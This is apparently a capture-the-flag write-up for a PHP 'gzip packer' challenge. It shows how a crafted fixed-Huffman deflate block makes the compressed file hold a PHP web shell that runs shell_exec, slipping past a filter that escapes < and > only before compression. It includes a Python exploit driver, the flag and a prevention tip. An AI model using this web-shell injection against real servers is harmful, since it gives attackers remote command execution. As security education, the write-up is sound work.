📃 Challenge Description

A cool service for you that should have existed in 1999

🔎 Research

We are given a zip file containing the sources to deploy our own server. A quick look into the files shows that the flag is stored in the flag.php file:

Untitled

Okay, let's take a look at the website.

Untitled1

Here we can enter a URL that will be fetched and gzipped to a file. This file is stored on the server, and we can download it if we want. Here is the source code for this part:

<?php
error_reporting(E_ALL);
session_start();
 

if (!isset($_SESSION['userid'])) {
	die("No userid set. Call index.php first to set the cookie");
  }

if (!isset($_POST["url"])) {
	die("No url set");
}
$url = $_POST["url"];

$ext = ".txt.gz";

if (isset($_POST["ext"])) {
	if (preg_match("/([.a-z0-9]{3,10})/", $_POST["ext"], $matches) == 1) {
		$ext = $matches[0];
	}
}

if (strpos($ext, "..") !== FALSE) {
	die("Hacking!");
}

if (!file_exists('uploads')) {
	mkdir('uploads', 0777, true);
}

$user_dir = 'uploads/' . $_SESSION['userid'] . "/";

if (!file_exists($user_dir)) {
	mkdir($user_dir, 0777, true);
}

if (substr( $url, 0, 7 ) !== "http://" && substr( $url, 0, 8 ) !== "https://") {
	die("Invalid url!");
}

$data_to_compress = file_get_contents($url);
$data_to_compress = "----------- CREATED WITH GZIP PACKER V0.1  -------------------\n" . $data_to_compress;

// We dont like XSS, filter the worst chars
$data_to_compress = str_replace("<", "&lt;", $data_to_compress);
$data_to_compress = str_replace(">", "&gt;", $data_to_compress);

$output_file = $user_dir  . 'outputfile' . $ext;

$gz = gzopen($output_file,'w9');
gzwrite($gz, $data_to_compress);
gzclose($gz);

echo "<a href='" . $output_file . "'>Download file</a>";

As it turns out, we cannot bypass the extension or URL filter to get an LFI. Instead, we have to somehow inject a web shell into the gzipped file on the server, so that we can execute commands when accessing it.
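To get a feel for what the extension filter accepts, the check can be mirrored in a few lines of Python. This is only a sketch: it uses Python's `re` module instead of PHP's PCRE (the two should agree for a pattern this simple), and the function name `pick_extension` is made up for illustration.

```python
import re

DEFAULT_EXT = ".txt.gz"  # default used by compress.php


def pick_extension(user_ext):
    """Approximate the ext handling of compress.php (hypothetical helper)."""
    ext = DEFAULT_EXT
    if user_ext is not None:
        # preg_match returns the first run of 3 to 10 allowed characters.
        match = re.search(r"([.a-z0-9]{3,10})", user_ext)
        if match:
            ext = match.group(0)
    # Same check as strpos($ext, "..") !== FALSE.
    if ".." in ext:
        raise ValueError("Hacking!")
    return ext


print(pick_extension(".php"))              # an executable extension passes
print(pick_extension("../../etc/passwd"))  # slashes never survive the regex
```

Since `/` is not in the allowed character class, the extension cannot climb out of the upload directory, but an extension such as `.php` is accepted without complaint.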

📝 Vulnerability Description

The program only filters the characters < and > in the uncompressed data. This prevents RCE when the payload ends up in a stored (uncompressed) block, because the escaped text is copied into the file verbatim. However, if we craft a payload that contains neither < nor >, so that it is compressed into a fixed or dynamic Huffman block, and the compressed bytes of that block contain < and >, we can bypass this filter.
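The order of operations is the important part, and it can be reproduced locally. The following is a rough Python imitation of the server pipeline (prepend banner, escape, gzip); the helper name `pack` is an assumption, and Python's gzip header bytes may differ from what PHP's `gzopen` writes.

```python
import gzip

# Banner that compress.php prepends to the fetched data.
BANNER = b"----------- CREATED WITH GZIP PACKER V0.1  -------------------\n"


def pack(fetched: bytes) -> bytes:
    """Imitate compress.php: prepend banner, escape < and >, then gzip."""
    data = BANNER + fetched
    data = data.replace(b"<", b"&lt;").replace(b">", b"&gt;")
    return gzip.compress(data, compresslevel=9)


# A naive payload is neutralised before compression ...
plain = gzip.decompress(pack(b"<?=phpinfo();?>"))
print(b"<" in plain)  # the decompressed text no longer contains '<'

# ... but nothing ever inspects the bytes returned by pack() itself,
# and those are the bytes the web server reads from disk.
```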

🧠 Exploit Development

For the web shell that will be injected into the gzipped file, we will use an already engineered payload for fixed Huffman encoding from idontplaydarts:

Untitled2

NOTE that <?= is a shortcut for <?php echo. So with this payload we can execute any arbitrary php function with any arbitrary parameter. For our use cases the shell_exec function is exactly what we want so we can emulate a web shell through that. We specify this function in the GET parameter with the key '0', and the parameter for this function in the POST body with the key '1'.
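Talking to such a shell then comes down to one HTTP request. Below is a small sketch using only the standard library; the URL is a placeholder, `build_shell_request` is a made-up helper, and the request is only built, not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_shell_request(shell_url, command, function="shell_exec"):
    """Build (but do not send) a request for the web shell.

    GET parameter '0' names the PHP function,
    POST parameter '1' carries its argument.
    """
    query = urlencode({"0": function})
    body = urlencode({"1": command}).encode("ascii")
    return Request(f"{shell_url}?{query}", data=body)


# Placeholder URL, not taken from the challenge.
req = build_shell_request(
    "http://localhost:8080/uploads/someuser/outputfile.php", "cat flag.php"
)
print(req.get_method(), req.full_url, req.data)
```

Passing the result to `urllib.request.urlopen` would actually send it.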

Because our payload is prepended with the string "----------- CREATED WITH GZIP PACKER V0.1  -------------------\n", we cannot simply use the payload above as it is. The problem is that the web shell payload is designed to work only when it is deflated at the very beginning of a block. The DEFLATE specification describes the start of each block in a deflated stream as follows:

Untitled3

Untitled4

So the first 3 bits in a new block describe if the block is the last block and what blocktype is used. When gzipping our web shell payload, the start of the block would look like

0b01100_011 # web shell starts at the 4th LSB
0b01011110 # character '^'
0b00111100 # character '<'
0b00111111 # character '?'
# ...

Reading the first byte from the right, the lowest bit (1) marks this block as the last block, and the next two bits (01) mark it as a fixed Huffman block.
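These three header bits are easy to read out programmatically. A minimal sketch, assuming a raw deflate stream (no gzip or zlib wrapper); the helper names are invented for this example.

```python
import zlib

BLOCK_TYPES = {0: "stored", 1: "fixed Huffman", 2: "dynamic Huffman", 3: "reserved"}


def raw_deflate(data, level=9):
    """Compress to a raw deflate stream (wbits=-15 drops the zlib wrapper)."""
    comp = zlib.compressobj(level, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def first_block_header(stream):
    """Return (BFINAL, block type name) of the first deflate block."""
    first = stream[0]
    bfinal = first & 1            # lowest bit: is this the last block?
    btype = (first >> 1) & 0b11   # next two bits: block type
    return bfinal, BLOCK_TYPES[btype]


print(first_block_header(bytes([0b01100011])))           # byte from the listing above
print(first_block_header(raw_deflate(b"hello")))         # short input, compressed
print(first_block_header(raw_deflate(b"hello", level=0)))  # level 0 stores the data
```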

However, when the web shell is gzipped together with the prepended string, this alignment is destroyed. We can see that the compressed web shell now starts at the 5th bit:

0b1100_0101 # web shell starts at the 5th LSB
0b10111100 # character '¼'
0b01111000 # character 'x'
0b01111110 # character '~'
# ...

Obviously, the different alignment destroys the web shell. To fix that, let's take a look at how deflate compresses data using the fixed Huffman encoding:

Untitled5

So literal values from 144 to 255 are represented as 9-bit codes ranging from 0b110010000 to 0b111111111. Each 9-bit literal placed in front of the web shell shifts its starting position by one bit modulo 8, so prepending seven of them moves the start from the 5th bit back to the original 4th bit. I chose \x90\x91\x92\x93\x94\x95\x93 as my seven nine-bit literals, and we can see that the web shell payload is aligned to the 4th bit again:
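The alignment arithmetic can be checked with a short sketch. The code ranges for literals come from RFC 1951; the function names and the zero-based bit offsets (offset 3 for the 4th bit, offset 4 for the 5th bit) are conventions chosen for this example.

```python
def fixed_literal_code(value):
    """Return (code, bit length) of a literal byte in the fixed Huffman table."""
    if 0 <= value <= 143:
        return 0b00110000 + value, 8
    if 144 <= value <= 255:
        return 0b110010000 + (value - 144), 9
    raise ValueError("not a literal byte")


def nine_bit_literals_needed(current_offset, target_offset):
    """Each 9-bit literal moves the following data by 9 bits, i.e. 1 bit mod 8."""
    return (target_offset - current_offset) % 8


padding = b"\x90\x91\x92\x93\x94\x95\x93"

# Every padding byte must fall into the 9-bit range for the trick to work.
print(all(fixed_literal_code(b)[1] == 9 for b in padding))

# Shell currently at bit offset 4 (5th bit), wanted at offset 3 (4th bit).
print(nine_bit_literals_needed(4, 3), len(padding))
```

Moving from offset 4 to offset 3 takes seven shifts, which matches the seven padding bytes listed above.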

0b01100_110 # web shell starts at the 4th LSB, same as the original
0b01011110 # character '^'
0b00111100 # character '<'
0b00111111 # character '?'
# ...

So our final payload looks like this:

Untitled6

When this payload is gzipped on the server, it yields the web shell:

Untitled7

🔐 Exploit Program

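import gzip
import re
import sys

import requests

# Expects the webapp base URL (with trailing slash), the URL the server
# should fetch, and the extension for the output file.
if len(sys.argv) < 4:
	print("Usage: python3 xtool.py <webapp-uri> <upload-uri> <ext>")
	sys.exit(0)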

url = str(sys.argv[1])

#get user_id cookie
def get_user_id_cookie(s):
	s.get(url)

def parse_error(r):
	if(not r.ok):
		return "Not OK"
	if("Invalid" in r.text):
		return "Invalid"
	elif("userid" in r.text):
		return "userid"
	elif("Hacking" in r.text):
		return "Hacking"
	return ""

def compress_request(s, cookies, headers, file_uri, ext, data):
	r = s.post(url+"compress.php", data=data, cookies=cookies, headers=headers)

	error = parse_error(r)
	if(error):
		print(error)
		sys.exit(0)
	return r

def extract_download_link(r):
	link = re.findall("href='.*?'", r.text)
	if(link):
		return url + link[0].replace("'","").replace("href=","")

def decompress_file(s, link_to_file):
	r = s.get(link_to_file)
	d = gzip.decompress(r.content)
	return d.decode('utf-8')

cookies = {}
headers = {}

file_uri = str(sys.argv[2]).encode("utf-8")
ext = str(sys.argv[3])
print("webapp: {0}".format(str(url)))
print("file_uri: {0}".format(str(file_uri)))
print("ext: {0}".format(str(ext)))

data = {"url": file_uri, "ext": ext}

s = requests.Session()
get_user_id_cookie(s)
print("Set user_id cookie")
r = compress_request(s, cookies, headers, file_uri, ext, data)
print("Sent compress request...")
link = extract_download_link(r)
print("Decompressing file {0}".format(str(link)))
c = decompress_file(s, link)
print("Decompressed output: \n{0}".format(str(c)))

💥 Run Exploit

FLAG: CSCG{I_h0pe_y0u_f0und_th3_sh0rt_tags_(btw_idea_was_from_CVE2020_11060)}

🛡️ Possible Prevention

To prevent this exploit, one should also scan the compressed gzip output and take action if a sequence such as <? occurs in it. This can lead to false positives, but without a specially crafted input a <? sequence inside the compressed data is very unlikely.
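Such a check could look roughly like the following. It is written in Python for consistency with the exploit script, although the real fix would live in the PHP code; the marker list and the function name are assumptions, not part of the challenge.

```python
# Byte sequences that must never appear in a file the web server may serve.
# Only "<?" is taken from the text above; extend as needed.
SUSPICIOUS_MARKERS = (b"<?",)


def compressed_output_is_safe(compressed: bytes) -> bool:
    """Return False if the compressed bytes contain a PHP open tag."""
    return not any(marker in compressed for marker in SUSPICIOUS_MARKERS)


print(compressed_output_is_safe(b"\x1f\x8b\x08\x00harmless"))
print(compressed_output_is_safe(b"\x1f\x8b\x08\x00^<?=$_GET[0]"))
```

A caller would delete the output file (or refuse to write it) whenever the function returns False.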

🗄️ Summary / Difficulties

Personally, I enjoyed this challenge a lot! The context of a real CVE also made it very interesting. I learned a lot about zlib internals and had a lot of fun reversing the deflate algorithm. There are many more possible approaches to solving this challenge, which makes it very valuable for CTF players.

🗃️ Further References

RFC 1951 - DEFLATE Compressed Data Format Specification version 1.3

Playing with GZIP: RCE in GLPI (CVE-2020-11060)

Revisiting XSS payloads in PNG IDAT chunks

Deflate Format: differences between type blocks

Encoding Web Shells in PNG IDAT chunks